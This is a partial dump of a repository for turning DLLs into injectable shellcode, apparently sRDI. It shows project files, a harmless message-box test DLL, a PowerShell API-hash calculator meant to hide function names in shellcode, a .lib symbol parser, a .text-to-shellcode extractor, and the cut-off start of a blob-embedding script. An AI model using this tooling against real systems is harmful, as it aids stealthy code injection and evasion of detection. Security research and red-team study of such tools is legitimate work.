5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/ShellcodeRDI/function_link_order.txt:
--------------------------------------------------------------------------------
1 | LoadDLL
2 | GetProcAddressWithHash
--------------------------------------------------------------------------------
/TestDLL/Resource.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/monoxgas/sRDI/9fdd5c44383039519accd1e6bac4acd5a046a92c/TestDLL/Resource.rc
--------------------------------------------------------------------------------
/TestDLL/TestDLL.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}
23 | Win32Proj
24 | TestDLL
25 | 10.0
26 |
27 |
28 |
29 | DynamicLibrary
30 | true
31 | v142
32 | Unicode
33 |
34 |
35 | DynamicLibrary
36 | false
37 | v142
38 | true
39 | Unicode
40 |
41 |
42 | DynamicLibrary
43 | true
44 | v142
45 | Unicode
46 |
47 |
48 | DynamicLibrary
49 | false
50 | v142
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions)
91 | MultiThreadedDebug
92 | Async
93 |
94 |
95 | Windows
96 | true
97 |
98 |
99 | copy /y "$(TargetPath)" "$(SolutionDir)Bin\TestDLL_x86.dll"
100 |
101 |
102 |
103 |
104 |
105 |
106 | Level3
107 | Disabled
108 | _DEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions)
109 | MultiThreadedDebug
110 | Async
111 |
112 |
113 | Windows
114 | true
115 |
116 |
117 | copy /y "$(TargetPath)" "$(SolutionDir)Bin\TestDLL_x64.dll"
118 |
119 |
120 |
121 |
122 | Level3
123 |
124 |
125 | MaxSpeed
126 | true
127 | true
128 | WIN32;NDEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions)
129 | MultiThreaded
130 | Async
131 |
132 |
133 | Windows
134 | true
135 | true
136 | true
137 |
138 |
139 | copy /y "$(TargetPath)" "$(SolutionDir)Bin\TestDLL_x86.dll"
140 |
141 |
142 |
143 |
144 | Level3
145 |
146 |
147 | MaxSpeed
148 | true
149 | true
150 | NDEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions)
151 | MultiThreaded
152 | Async
153 |
154 |
155 | Windows
156 | true
157 | true
158 | true
159 |
160 |
161 | copy /y "$(TargetPath)" "$(SolutionDir)Bin\TestDLL_x64.dll"
162 |
163 |
164 |
165 |
166 | false
167 |
168 |
169 | false
170 |
171 |
172 | false
173 |
174 |
175 | false
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
--------------------------------------------------------------------------------
/TestDLL/TestDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/TestDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
DWORD threadID; // Not referenced anywhere in this file.
5 |
// Standard DLL entry point. Only DLL_PROCESS_ATTACH does anything (a
// message box to show the entry point ran); thread attach/detach and
// process detach are deliberate no-ops. Always reports success.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        MessageBoxA(NULL, "DLLMain!", "We've started.", 0);
    }
    return TRUE;
}
23 |
24 | //extern "C" to prevent C++ name mangling
// Test export: deliberately raises a hardware (structured) exception and
// catches it with a C++ handler. A catch(...) only sees an SEH fault when the
// translation unit is compiled with asynchronous exception handling (/EHa);
// the project file appears to set ExceptionHandling to Async - confirm in
// TestDLL.vcxproj. Presumably meant to exercise the loader's exception-table
// registration on x64. Both parameters are unused.
extern "C" __declspec(dllexport) BOOL SayGoodbye(LPVOID lpUserdata, DWORD nUserdataLen)
{
    try {
        // NOTE(review): relies on the compiler not folding the constant
        // division at build time.
        int i = 0, j = 1;
        j /= i; // This will throw a SE (divide by zero).
    }
    catch (...) {
        MessageBoxA(NULL, "C++ Exception Thrown!", "Caught it", 0);
    }

    MessageBoxA(NULL, "I'm Leaving!", "Goodbye", 0);

    return TRUE;
}
39 |
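// Test export: greets the caller with the user data it was handed.
//
// lpUserdata / nUserdataLen come straight from the loader's caller and are
// treated as an untrusted, possibly unterminated byte buffer: the %.*s
// precision bounds the read to nUserdataLen so a missing NUL cannot run the
// read past the buffer. Returns FALSE only if the greeting buffer could not
// be allocated; TRUE otherwise.
extern "C" __declspec(dllexport) BOOL SayHello(LPVOID lpUserdata, DWORD nUserdataLen)
{
    if (nUserdataLen) {
        // "Hello " (6) + data + "!" (1) + NUL (1) = 8 + nUserdataLen; the
        // original 10-byte slack is kept.
        DWORD length = 10 + nUserdataLen;
        LPSTR greeting = (LPSTR)malloc(length);
        if (greeting == NULL) {
            return FALSE;
        }
        sprintf_s(greeting, length, "Hello %.*s!", (int)nUserdataLen, (LPSTR)lpUserdata);
        MessageBoxA(NULL, greeting, "Hello", 0);
        free(greeting);
    }
    else {
        MessageBoxA(NULL, "I'm alive!", "Hello", 0);
    }

    return TRUE;
}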
55 |
56 |
--------------------------------------------------------------------------------
/TestDLL/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Resource.rc
4 |
5 | // Next default values for new objects
6 | //
7 | #ifdef APSTUDIO_INVOKED
8 | #ifndef APSTUDIO_READONLY_SYMBOLS
9 | #define _APS_NEXT_RESOURCE_VALUE 101
10 | #define _APS_NEXT_COMMAND_VALUE 40001
11 | #define _APS_NEXT_CONTROL_VALUE 1001
12 | #define _APS_NEXT_SYMED_VALUE 101
13 | #endif
14 | #endif
15 |
--------------------------------------------------------------------------------
/bin/.gitignore:
--------------------------------------------------------------------------------
1 | # Ignore everything in this directory
2 | *
3 | # Except this file
4 | !.gitignore
--------------------------------------------------------------------------------
/lib/PowerShell/Get-FunctionHash.ps1:
--------------------------------------------------------------------------------
function Get-FunctionHash
{
<#
.SYNOPSIS

Outputs a module and function hash that can be passed to the
GetProcAddressWithHash function.

PowerSploit Function: Get-FunctionHash
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Get-FunctionHash calculates a hash that can be passed to
GetProcAddressWithHash - a C function that is used to resolve Win32
library functions. Passing a hash to a function address resolver
prevents plaintext strings from being sent in the clear in shellcode.

The same calculation is useful on the analysis side: given a hashed API
constant recovered from a sample, candidate module/function pairs can be
hashed here and compared against it.

A python implementation of this algorithm is present in Metasploit and
will perform hash collision detection.

.PARAMETER Module

Specifies the module to be hashed. Be sure to include the file extension.
The module name will be normalized to upper case.

.PARAMETER Function

Specifies the function to be hashed. The function name is case-sensitive.

.PARAMETER RorValue

Specifies the value by which the hashing algorithm rotates right. The
range of possibles values is 1-31. It applies to the function half of the
hash only; the module half always rotates by 13.

.EXAMPLE

Get-FunctionHash kernel32.dll LoadLibraryA

.OUTPUTS

System.String

Outputs a hexadecimal representation of the function hash.

.LINK

http://www.exploit-monday.com/
https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py
#>

    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [String]
        $Module,

        [Parameter(Position = 1, Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [String]
        $Function,

        # NOTE(review): declared [String] although ValidateRange is numeric;
        # PowerShell coerces it back to UInt32 at the delegate call, but
        # [UInt32] would be the natural type.
        [Parameter(Position = 2)]
        [ValidateRange(1, 31)]
        [String]
        $RorValue = 13
    )

    # Two tiny IL methods are emitted instead of using PowerShell operators,
    # presumably to get wrap-around 32-bit arithmetic: PowerShell's own '+'
    # and shifts widen to Int64/Double rather than wrapping.
    $MethodInfo = New-Object Reflection.Emit.DynamicMethod('Ror', [UInt32], @([UInt32], [UInt32]))
    $ILGen = $MethodInfo.GetILGenerator(8)

    # C# equivalent of: return x >> n | x << 32 - n;
    # (both shift counts are masked with 31, so n = 0 or 32 is a no-op rather than UB)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldc_I4_S, 31)
    $ILGen.Emit([Reflection.Emit.OpCodes]::And)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Shr_Un)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldc_I4_S, 32)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Sub)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldc_I4_S, 31)
    $ILGen.Emit([Reflection.Emit.OpCodes]::And)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Shl)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Or)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ret)

    $Delegate = [Func``3[UInt32, UInt32, UInt32]]

    $Ror = $MethodInfo.CreateDelegate($Delegate)

    $MethodInfo = New-Object Reflection.Emit.DynamicMethod('Add', [UInt32], @([UInt32], [UInt32]))
    $ILGen = $MethodInfo.GetILGenerator(2)

    # C# equivalent of: return x + y;
    # (plain 'add', not 'add.ovf', so the sum wraps modulo 2^32)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Add)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ret)

    $Add = $MethodInfo.CreateDelegate($Delegate)

    $UnicodeEncoder = [Text.Encoding]::Unicode

    # Module half: upper-cased UTF-16LE bytes plus a two-byte terminator,
    # rotate-then-add per byte with a fixed rotation of 13. This matches the
    # note in ShellcodeRDI.c that module hashes use all-caps unicode strings.
    $Module = $Module.ToUpper()
    [Byte[]] $ModuleBytes = $UnicodeEncoder.GetBytes($Module) + [Byte[]] @(0, 0)
    $ModuleHash = [UInt32] 0

    # Iterate over each byte of the unicode module string including nulls
    for ($i = 0; $i -lt $ModuleBytes.Length; $i++)
    {
        $ModuleHash = $Ror.Invoke($ModuleHash, 13)
        $ModuleHash = $Add.Invoke($ModuleHash, $ModuleBytes[$i])
    }

    # Function half: ASCII bytes plus a one-byte terminator, rotated by
    # -RorValue. Rotate-then-add over the bytes including the terminator is
    # the same value as add-then-rotate over the bytes without it, so with the
    # default of 13 this half equals the export-name hash LoadDLL computes in
    # ShellcodeRDI.c (STEP 11).
    $AsciiEncoder = [Text.Encoding]::ASCII
    [Byte[]] $FunctionBytes = $AsciiEncoder.GetBytes($Function) + @([Byte] 0)
    $FunctionHash = [UInt32] 0

    # Iterate over each byte of the function string including the null terminator
    for ($i = 0; $i -lt $FunctionBytes.Length; $i++)
    {
        $FunctionHash = $Ror.Invoke($FunctionHash, $RorValue)
        $FunctionHash = $Add.Invoke($FunctionHash, $FunctionBytes[$i])
    }

    # Add the function hash to the module hash (wrapping 32-bit add)
    $FinalHash = $Add.Invoke($ModuleHash, $FunctionHash)

    # Write out the hexadecimal representation of the hash
    Write-Output "0x$($FinalHash.ToString('X8'))"
}
--------------------------------------------------------------------------------
/lib/PowerShell/Get-LibSymbols.ps1:
--------------------------------------------------------------------------------
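function Get-LibSymbols
{
<#
.SYNOPSIS

Displays symbolic information from Windows lib files.

PowerSploit Function: Get-LibSymbols
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Get-LibSymbols parses and returns symbols in Windows .lib files
in both decorated and undecorated form (for C++ functions). Only
archive members whose pseudo COFF header carries the 0xFFFF import
marker are emitted; members holding real object files are skipped.
The lib file is treated as untrusted input: declared counts and
offsets are checked against the file size before they are used, and
the file handle is released even if parsing aborts part way through.

.PARAMETER Path

Specifies a path to one or more lib file locations.

.EXAMPLE

C:\PS>Get-LibSymbols -Path msvcrt.lib

.EXAMPLE

C:\PS>ls *.lib | Get-LibSymbols

.INPUTS

System.String[]

You can pipe a file system path (in quotation marks) to Get-LibSymbols.

.OUTPUTS

COFF.SymbolInfo

.LINK

http://www.exploit-monday.com/
#>
    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
        [ValidateScript({ Test-Path $_ })]
        [Alias('FullName')]
        [String[]]
        $Path
    )

    BEGIN
    {
        $Code = @'
using System;
using System.IO;
using System.Text;
using System.Runtime.InteropServices;

namespace COFF
{
    // The 20-byte COFF file header. In an import library member this header is a pseudo
    // header: NumberOfSections holds the 0xFFFF marker and NumberOfSymbols holds the
    // length of the "symbol\0module\0" string pair that follows.
    public class HEADER
    {
        public ushort Machine;
        public ushort NumberOfSections;
        public DateTime TimeDateStamp;
        public uint PointerToSymbolTable;
        public uint NumberOfSymbols;
        public ushort SizeOfOptionalHeader;
        public ushort Characteristics;

        public HEADER(BinaryReader br)
        {
            this.Machine = br.ReadUInt16();
            this.NumberOfSections = br.ReadUInt16();
            // The stamp is seconds since the Unix epoch, expressed in UTC.
            this.TimeDateStamp = (new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddSeconds(br.ReadUInt32());
            this.PointerToSymbolTable = br.ReadUInt32();
            this.NumberOfSymbols = br.ReadUInt32();
            this.SizeOfOptionalHeader = br.ReadUInt16();
            this.Characteristics = br.ReadUInt16();
        }
    }

    // The 60-byte ar(1)-style member header: fixed-width, space-padded ASCII fields.
    public class IMAGE_ARCHIVE_MEMBER_HEADER
    {
        public string Name;
        public DateTime Date;
        public ulong Size;
        public string EndHeader;

        public IMAGE_ARCHIVE_MEMBER_HEADER(BinaryReader br)
        {
            // Name is terminated by '/'; the first linker member has an empty name ("/").
            string tempName = Encoding.UTF8.GetString(br.ReadBytes(16));
            int slash = tempName.IndexOf('/');
            this.Name = slash >= 0 ? tempName.Substring(0, slash) : tempName.TrimEnd();

            // Fields are padded with spaces (0x20); Trim() rather than Split so an empty
            // field does not reach the numeric parsers.
            DateTime epoch = new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc);
            string dateField = Encoding.UTF8.GetString(br.ReadBytes(12)).Trim();
            this.Date = dateField.Length > 0 ? epoch.AddSeconds(Convert.ToDouble(dateField)) : epoch;

            br.ReadBytes(20); // Skip over UserID, GroupID, and Mode. They are useless fields.

            string sizeField = Encoding.UTF8.GetString(br.ReadBytes(10)).Trim();
            this.Size = sizeField.Length > 0 ? Convert.ToUInt64(sizeField) : 0;

            this.EndHeader = Encoding.UTF8.GetString(br.ReadBytes(2));
        }
    }

    public class Functions
    {
        [DllImport("dbghelp.dll", SetLastError=true, PreserveSig=true)]
        public static extern int UnDecorateSymbolName(
            [In] [MarshalAs(UnmanagedType.LPStr)] string DecoratedName,
            [Out] StringBuilder UnDecoratedName,
            [In] [MarshalAs(UnmanagedType.U4)] uint UndecoratedLength,
            [In] [MarshalAs(UnmanagedType.U4)] uint Flags);
    }
}
'@

        Add-Type -TypeDefinition $Code
    }

    PROCESS
    {
        foreach ($File in $Path)
        {
            # Resolve the absolute path of the lib file. [IO.File]::OpenRead requires an absolute path.
            $LibFilePath = Resolve-Path $File

            # Pull out just the file name for messages
            $LibFileName = Split-Path $LibFilePath -Leaf

            $IMAGE_SIZEOF_ARCHIVE_MEMBER_HDR = 60
            $IMAGE_ARCHIVE_START = "!<arch>`n" # 8-byte magic at the start of a lib file
            $IMAGE_SIZEOF_LIB_HDR = $IMAGE_SIZEOF_ARCHIVE_MEMBER_HDR + $IMAGE_ARCHIVE_START.Length
            $IMAGE_ARCHIVE_END = "```n" # Footer of an archive member header
            $SizeofCOFFFileHeader = 20

            # Open the lib file for reading
            $FileStream = [IO.File]::OpenRead($LibFilePath)
            $BinaryReader = $null

            try
            {
                $BinaryReader = New-Object IO.BinaryReader($FileStream)
                $FileLength = $FileStream.Length

                # Validate lib header size
                if ($FileLength -lt $IMAGE_SIZEOF_LIB_HDR)
                {
                    # You cannot parse the lib header if the file is not big enough to contain a lib header.
                    Write-Error "$($LibFileName) is too small to store a lib header."
                    continue
                }

                $ArchiveStart = [Text.Encoding]::UTF8.GetString($BinaryReader.ReadBytes($IMAGE_ARCHIVE_START.Length))

                if ($ArchiveStart -ne $IMAGE_ARCHIVE_START)
                {
                    Write-Error "$($LibFileName) does not contain a valid lib header."
                    continue
                }

                # Parse the first linker member header
                $ArchiveHeader = New-Object COFF.IMAGE_ARCHIVE_MEMBER_HEADER($BinaryReader)

                if ($ArchiveHeader.EndHeader -ne $IMAGE_ARCHIVE_END)
                {
                    Write-Error "$($LibFileName) does not contain a valid lib header."
                    continue
                }

                # Check for the existence of symbols
                if ($ArchiveHeader.Size -eq 0)
                {
                    Write-Warning "$($LibFileName) contains no symbols."
                    continue
                }

                # The symbol count and offsets in the first linker member are stored big-endian
                $CountBytes = $BinaryReader.ReadBytes(4)

                if ([BitConverter]::IsLittleEndian)
                {
                    [Array]::Reverse($CountBytes)
                }

                $NumberOfSymbols = [BitConverter]::ToUInt32($CountBytes, 0)

                # The offset table (4 bytes per symbol) must fit inside the member as declared.
                # Without this check a forged count drives a multi-gigabyte allocation below.
                if (($ArchiveHeader.Size -lt 4) -or (($NumberOfSymbols * 4) -gt ($ArchiveHeader.Size - 4)))
                {
                    Write-Error "$($LibFileName) declares $($NumberOfSymbols) symbols, more than its first linker member can hold."
                    continue
                }

                $SymbolOffsets = New-Object UInt32[]($NumberOfSymbols)

                # A counted for loop (rather than 0..N-1) so a zero count reads nothing
                for ($Index = 0; $Index -lt $NumberOfSymbols; $Index++)
                {
                    $OffsetBytes = $BinaryReader.ReadBytes(4)

                    if ([BitConverter]::IsLittleEndian)
                    {
                        [Array]::Reverse($OffsetBytes)
                    }

                    $SymbolOffsets[$Index] = [BitConverter]::ToUInt32($OffsetBytes, 0)
                }

                # There will be many duplicate offset entries. Remove them.
                $SymbolOffsetsSorted = $SymbolOffsets | Sort-Object -Unique

                foreach ($MemberOffset in $SymbolOffsetsSorted)
                {
                    # A member header plus the 20-byte pseudo COFF header must lie inside the file
                    if (($MemberOffset + $IMAGE_SIZEOF_ARCHIVE_MEMBER_HDR + $SizeofCOFFFileHeader) -gt $FileLength)
                    {
                        Write-Warning "$($LibFileName): member offset 0x$($MemberOffset.ToString('X8')) lies outside the file. Skipping."
                        continue
                    }

                    # Seek to the respective member offset in the file
                    $FileStream.Seek($MemberOffset, 'Begin') | Out-Null

                    # Read past the member header; its fields are not needed here
                    $MemberHeader = New-Object COFF.IMAGE_ARCHIVE_MEMBER_HEADER($BinaryReader)

                    # This is not a true COFF header. It's the same size and mostly resembles a standard COFF header
                    # but Microsoft placed a marker (0xFFFF) in the WORD where NumberOfSections would be to indicate
                    # that the 'object file' consists solely of the module name and symbol.
                    $CoffHeader = New-Object COFF.HEADER($BinaryReader)

                    # Members without the 0xFFFF flag are real object files and carry no import symbol
                    if ($CoffHeader.NumberOfSections -ne [UInt16]::MaxValue)
                    {
                        continue
                    }

                    # Get the total length of the module and symbol name and make sure it is inside the file
                    $SymbolStringLength = $CoffHeader.NumberOfSymbols

                    if (($FileStream.Position + $SymbolStringLength) -gt $FileLength)
                    {
                        Write-Warning "$($LibFileName): symbol string at 0x$($FileStream.Position.ToString('X8')) runs past the end of the file. Skipping."
                        continue
                    }

                    $Symbols = [Text.Encoding]::UTF8.GetString($BinaryReader.ReadBytes($SymbolStringLength)).Split([Char] 0)

                    $DecoratedSymbol = $Symbols[0]
                    $ModuleName = $null
                    if ($Symbols.Length -gt 1)
                    {
                        $ModuleName = $Symbols[1]
                    }

                    $UndecoratedSymbol = ''

                    # Default to a 'C' type symbol unless it starts with a '?'
                    $SymbolType = 'C'

                    if ($DecoratedSymbol.StartsWith('?', [StringComparison]::Ordinal))
                    {
                        # C++ symbol: let dbghelp undecorate it. A zero return means it failed,
                        # in which case UndecoratedName is left empty and the failure is logged.
                        $StrBuilder = New-Object Text.StringBuilder(512)
                        $Written = [COFF.Functions]::UnDecorateSymbolName($DecoratedSymbol, $StrBuilder, $StrBuilder.Capacity, 0)

                        if ($Written -gt 0)
                        {
                            $UndecoratedSymbol = $StrBuilder.ToString()
                        }
                        else
                        {
                            Write-Verbose "$($LibFileName): UnDecorateSymbolName failed for $($DecoratedSymbol)."
                        }

                        $SymbolType = 'C++'
                    }
                    elseif (($DecoratedSymbol.Length -gt 0) -and (($DecoratedSymbol[0] -eq '_') -or ($DecoratedSymbol[0] -eq '@')))
                    {
                        # C symbol with a leading underscore/at and an optional @N stack-size suffix
                        $UndecoratedSymbol = $DecoratedSymbol.Substring(1).Split('@')[0]
                    }
                    else
                    {
                        $UndecoratedSymbol = $DecoratedSymbol.Split('@')[0]
                    }

                    $SymInfo = @{
                        DecoratedName = $DecoratedSymbol
                        UndecoratedName = $UndecoratedSymbol
                        Module = $ModuleName
                        SymbolType = $SymbolType
                    }

                    $ParsedSymbol = New-Object PSObject -Property $SymInfo
                    $ParsedSymbol.PSObject.TypeNames[0] = 'COFF.SymbolInfo'

                    Write-Output $ParsedSymbol
                }
            }
            finally
            {
                # Release the handle even when a malformed member aborts parsing part way through
                if ($BinaryReader)
                {
                    $BinaryReader.Close()
                }
                $FileStream.Dispose()
            }
        }
    }

    END {}
}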
--------------------------------------------------------------------------------
/lib/PowerShell/Get-ObjDump.format.ps1xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | ObjectFileView
6 |
7 | COFF.OBJECT_FILE
8 |
9 |
10 |
11 |
12 |
13 |
14 | COFFHeader
15 |
16 |
17 | SectionHeaders
18 |
19 |
20 | SymbolTable
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | COFFHeaderView
29 |
30 | COFF.HEADER
31 |
32 |
33 |
34 |
35 |
36 |
37 | Machine
38 |
39 |
40 | NumberOfSections
41 | 0x{0:X4}
42 |
43 |
44 | TimeDateStamp
45 |
46 |
47 | PointerToSymbolTable
48 | 0x{0:X8}
49 |
50 |
51 | NumberOfSymbols
52 | 0x{0:X8}
53 |
54 |
55 | SizeOfOptionalHeader
56 | 0x{0:X4}
57 |
58 |
59 | Characteristics
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 | SectionHeaderView
68 |
69 | COFF.SECTION_HEADER
70 |
71 |
72 |
73 |
74 |
75 |
76 | Name
77 |
78 |
79 | PhysicalAddress
80 | 0x{0:X8}
81 |
82 |
83 | VirtualSize
84 | 0x{0:X8}
85 |
86 |
87 | VirtualAddress
88 | 0x{0:X8}
89 |
90 |
91 | SizeOfRawData
92 | 0x{0:X8}
93 |
94 |
95 | PointerToRawData
96 | 0x{0:X8}
97 |
98 |
99 | PointerToRelocations
100 | 0x{0:X8}
101 |
102 |
103 | PointerToLinenumbers
104 | 0x{0:X8}
105 |
106 |
107 | NumberOfRelocations
108 | 0x{0:X4}
109 |
110 |
111 | NumberOfLinenumbers
112 | 0x{0:X4}
113 |
114 |
115 | Characteristics
116 |
117 |
118 | RawData
119 |
120 |
121 | Relocations
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 | SymbolTableView
130 |
131 | COFF.SYMBOL_TABLE
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 | Name
163 |
164 |
165 | Value
166 | 0x{0:X8}
167 |
168 |
169 | SectionNumber
170 |
171 |
172 | Type
173 |
174 |
175 | StorageClass
176 |
177 |
178 | NumberOfAuxSymbols
179 | 0x{0:X2}
180 |
181 |
182 | AuxSymbols
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 | SectionDefinitionView
191 |
192 | COFF.SECTION_DEFINITION
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 | Length
221 | 0x{0:X8}
222 |
223 |
224 | NumberOfRelocations
225 | 0x{0:X4}
226 |
227 |
228 | NumberOfLinenumbers
229 | 0x{0:X4}
230 |
231 |
232 | CheckSum
233 | 0x{0:X8}
234 |
235 |
236 | Number
237 | 0x{0:X4}
238 |
239 |
240 | Selection
241 | 0x{0:X2}
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 | RelocationView
250 |
251 | COFF.RelocationEntry
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 | VirtualAddress
274 | 0x{0:X8}
275 |
276 |
277 | SymbolTableIndex
278 | 0x{0:X8}
279 |
280 |
281 | Type
282 |
283 |
284 | Name
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
--------------------------------------------------------------------------------
/lib/PowerShell/Out-Shellcode.ps1:
--------------------------------------------------------------------------------
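<#
.SYNOPSIS

Writes the .text section of a built executable to a raw binary file.

.DESCRIPTION

Out-Shellcode reads the PE image with Get-PEHeader, takes the raw data of its
.text section and writes the first N bytes of it to OutputFile, where N is the
.text length recorded in the linker map file (the section's raw data is
presumably padded past that length, which is why the map is consulted).

.PARAMETER InputExe

Path to the built executable whose .text section is extracted.

.PARAMETER InputMapFile

Path to the linker map file generated alongside InputExe.

.PARAMETER OutputFile

Path of the raw binary file to write.
#>
Param (
    [Parameter(Position = 0, Mandatory = $True)]
    [ValidateScript({ Test-Path $_ })]
    [String]
    $InputExe,

    [Parameter(Position = 1, Mandatory = $True)]
    [ValidateScript({ Test-Path $_ })]
    [String]
    $InputMapFile,

    [Parameter(Position = 2, Mandatory = $True)]
    [String]
    $OutputFile
)

# PowerShell v2 does not define $PSScriptRoot for scripts; derive it from the invocation.
if (!$PSScriptRoot) {
    $PSScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
}

. "$PSScriptRoot\Get-PEHeader.ps1"

$PE = Get-PEHeader $InputExe -GetSectionData
$TextSection = $PE.SectionHeaders | Where-Object { $_.Name -eq '.text' }

if (-not $TextSection)
{
    throw "$InputExe does not contain a .text section."
}

$MapContents = Get-Content $InputMapFile

# First map line that describes the .text section as CODE
$TextSectionInfo = @($MapContents | Where-Object { $_ -match '\.text.+CODE' })[0]

if (-not $TextSectionInfo)
{
    throw "$InputMapFile does not list a .text CODE section."
}

# Fields are whitespace-delimited; the second one is the section length in hex with a trailing 'H'.
$LengthField = @($TextSectionInfo -split ' ' | Where-Object { $_ })[1]

if (-not $LengthField)
{
    throw "Could not read the .text length from: $TextSectionInfo"
}

$ShellcodeLength = [Int] "0x$($LengthField.TrimEnd('H'))"
$RawData = $TextSection.RawData

# Never slice past the section: an out-of-range slice would silently yield a shorter blob.
if (($ShellcodeLength -le 0) -or ($ShellcodeLength -gt $RawData.Length))
{
    throw "Map file reports a .text length of $ShellcodeLength bytes but the section's raw data holds $($RawData.Length)."
}

Write-Host "Shellcode length: 0x$($ShellcodeLength.ToString('X4'))"

# [IO.File] resolves relative paths against the process working directory, not the PowerShell location.
$OutputPath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($OutputFile)

[IO.File]::WriteAllBytes($OutputPath, $RawData[0..($ShellcodeLength - 1)])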
35 |
--------------------------------------------------------------------------------
/lib/Python/EncodeBlobs.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import os
3 | import sys
4 |
# Sentinel comments in each loader source; the text between them is replaced with the blobs.
StartMarker = "MARKER:S"
EndMarker = "MARKER:E"

# C/C++ loader: escaped string literals plus explicit lengths.
NativeTemplate = '''
LPSTR rdiShellcode32 = "{}";
LPSTR rdiShellcode64 = "{}";
DWORD rdiShellcode32Length = {}, rdiShellcode64Length = {};
'''

# C# (and PowerShell) loader: comma-separated byte-array initialisers.
DotNetTemplate = '''
